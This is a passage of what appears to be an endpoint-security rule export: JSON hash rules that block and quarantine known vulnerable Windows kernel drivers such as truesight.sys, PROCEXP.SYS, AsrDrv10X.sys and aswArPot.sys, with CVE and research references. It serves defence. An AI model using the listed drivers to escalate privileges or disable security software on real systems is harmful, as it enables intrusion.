"source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cd085da7-3b1d-51fc-ad80-6fad58dc7426", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.823808Z", + "creation_date": "2026-03-23T11:45:30.823810Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.823816Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c50fd5f40905bc6a5e3dd556c2ac9076c45bf474b731cf6464e0524b7a628e1b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cd0cd0ee-da64-513b-8b06-892c11af7f8b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.495743Z", + "creation_date": "2026-03-23T11:45:31.495745Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": 
true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.495750Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1018ec7f5dd9a040766bcd50ea37af78eeb4e272fb62938c81570cc8bf579f78", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cd0d686d-4b39-5c8f-bfed-f31890b68fa6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.817321Z", + "creation_date": "2026-03-23T11:45:31.817323Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.817329Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "26fa810f6be2ac7eaf8abe164b866ced47bbaa09f75605482778724e1a99f0e6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cd238424-daa8-5ac1-a82b-630aa6f955ca", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.825458Z", + "creation_date": "2026-03-23T11:45:31.825460Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.825466Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8dd2a8f5333e47806e0a43c260a43558fcfe636e2da3ace624265425bf9dad3a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cd3de490-0e58-5300-b257-e8fd7fbd2e72", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.605413Z", + "creation_date": "2026-03-23T11:45:29.605415Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.605420Z", + "rule_level": null, + 
"rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "74716032cc2f63c67b9df0882c6794b4bf66147d943329db5f233a04c2fd9b12", + "comment": "Backstab Process Explorer driver (aka PROCEXP.SYS) [https://github.com/Yaxser/Backstab/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cd47f623-4458-5be1-9742-d54426297046", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.487180Z", + "creation_date": "2026-03-23T11:45:31.487182Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.487188Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f158b1653c6a42e9399b20704b5bd0e874bfff1accc74162e4b29a9eb6955218", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cd497a80-a8f7-508a-a1ae-61d5c29d6d3a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.814210Z", + "creation_date": "2026-03-23T11:45:31.814213Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.814221Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "35c4e2e810cd6526a6078d9e7fb5e084b7223da6d605830c9d11f5997791fe47", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cd5f956f-4af1-5d0c-947a-c90e546aa174", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.615677Z", + "creation_date": "2026-03-23T11:45:29.615679Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.615684Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9c513f4d4c38a10af9f4a967bb6c7901275adf0df8046fc7e1b7e4c3e3c7c3cf", + "comment": 
"MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cd72cf32-8a68-540b-bd38-31618cad8fbd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.818820Z", + "creation_date": "2026-03-23T11:45:31.818823Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.818831Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e259d26fedebd3a133c4455da83818ff37ec04fcaf79c1382763f5a5e0d49afc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cd86920f-ca70-5587-8d37-127347bd5abc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": 
"b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.977550Z", + "creation_date": "2026-03-23T11:45:29.977552Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.977558Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f15ae970e222ce06dbf3752b223270d0e726fb78ebec3598b4f8225b5a0880b1", + "comment": "Vulnerable Kernel Driver (aka CorsairLLAccess64.sys) [https://www.loldrivers.io/drivers/a9d9cbb7-b5f6-4e74-97a5-29993263280e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cd956d48-a814-57ad-b158-a0e702310218", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.482153Z", + "creation_date": "2026-03-23T11:45:31.482157Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.482167Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8cb0167095ae5e3c3614b8f292e1f492a50d9ee54123bc37935ad282e5aa0bab", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cd95ff3c-9515-5548-b244-77db4a972e00", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.613277Z", + "creation_date": "2026-03-23T11:45:29.613279Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.613285Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a7c2e7910942dd5e43e2f4eb159bcd2b4e71366e34a68109548b9fb12ac0f7cc", + "comment": "ASRock vulnerable drivers - Privilege Escalation (aka AsrDrv10X.sys) [CVE-2018-10709] [https://www.exploit-db.com/exploits/45716] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cd97ec33-e529-5337-99b8-5e0a15c441a5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.836310Z", + "creation_date": "2026-03-23T11:45:30.836313Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", 
+ "hl_testing_start_time": "2026-03-23T11:45:30.836322Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5ae14f1a2c380990785857b2e0581fd07208d26515a25463f39743018b756091", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cd9a55b4-88d6-57ac-917b-27c91c643d80", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.985321Z", + "creation_date": "2026-03-23T11:45:29.985323Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.985329Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7cfa5e10dff8a99a5d544b011f676bc383991274c693e21e3af40cf6982adb8c", + "comment": "Dangerous Physmem Kernel Driver (aka Se64a.Sys) [https://www.loldrivers.io/drivers/d819bee2-3bff-481f-a301-acc3d1f5fe58/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cd9bcdd8-d46b-55e7-93fe-4d7892a392f5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.455846Z", + "creation_date": "2026-03-23T11:45:30.455849Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.455858Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "02f63773cdd991c891e10044633630154ae6fa63dbfe9b35082e48d4924f2dde", + "comment": "Vulnerable Kernel Driver (aka HWiNFO32.SYS) [https://www.loldrivers.io/drivers/2225128d-a23f-434a-aaee-69a88ea64fbd/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cda14e89-71d0-5b27-8c5d-bb97ec72303a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.480526Z", + "creation_date": "2026-03-23T11:45:30.480528Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.480533Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"1eff553cab0e6db50aa18e1ea10fbc9349b7529c938df4bed580f037cddd1309", + "comment": "Vulnerable Kernel Driver (aka GtcKmdfBs.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cdab48d2-3808-58d5-b903-80adca284bde", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.471684Z", + "creation_date": "2026-03-23T11:45:30.471687Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.471696Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c1b41d6b91448e2409bb2f4fbf4aeb952adf373d0decc9d052277b89ba401407", + "comment": "Vulnerable Kernel Driver (aka AsIO.sys) [https://www.loldrivers.io/drivers/bd7e78db-6fd0-4694-ac38-dbf5480b60b9/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cdad37a0-259d-5608-9317-2ed27294edee", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": 
"b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.816264Z", + "creation_date": "2026-03-23T11:45:30.816266Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.816271Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e8eb1c821dbf56bde05c0c49f6d560021628df89c29192058ce68907e7048994", + "comment": "Vulnerable Kernel Driver (aka ngiodriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cdafbd2d-0afe-5cd6-85cc-0265ef6ca90e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.156774Z", + "creation_date": "2026-03-23T11:45:31.156776Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.156782Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b14e251fb2483ca4c555b4ec3ea204a04cfe2f08bdc54f27d8a0613df6a6e002", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cdb1059b-1361-5cbd-9336-640d795cb6f9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.472463Z", + "creation_date": "2026-03-23T11:45:30.472466Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.472475Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "019c2955e380dd5867c4b82361a8d8de62346ef91140c95cb311b84448c0fa4f", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cdb4fece-37fe-5512-a8c7-957e4b6b653c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.608688Z", + "creation_date": "2026-03-23T11:45:29.608690Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:29.608695Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "df0536cdaac3ccc891ae2c41d176927ddee16b0ecdc3701e3eb96b0132917003", + "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cdc4fb41-dc45-5953-8f3e-c3d10ed5611d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.968792Z", + "creation_date": "2026-03-23T11:45:29.968794Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.968800Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0b2ad05939b0aabbdc011082fad7960baa0c459ec16a2b29f37c1fa31795a46d", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cdc5ea31-cfb1-5f2f-9220-2c5adf36d768", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.457507Z", + "creation_date": "2026-03-23T11:45:30.457510Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.457519Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "db711ec3f4c96b60e4ed674d60c20ff7212d80e34b7aa171ad626eaa8399e8c7", + "comment": "Vulnerable Kernel Driver (aka rtkio64.sys ) [https://www.loldrivers.io/drivers/8d3f27bd-c3fd-48d0-913a-e2caa6fbd025/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cdcd8efe-f5df-5969-9372-256190f5479d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.829929Z", + "creation_date": "2026-03-23T11:45:31.829931Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.829937Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"4efdce2a99b86911359011fa82c9752cfe37a69d078ed6077106cc8634ea786c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cdceea7a-3c06-5b2b-b8ee-3449e6d36deb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.605539Z", + "creation_date": "2026-03-23T11:45:29.605541Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 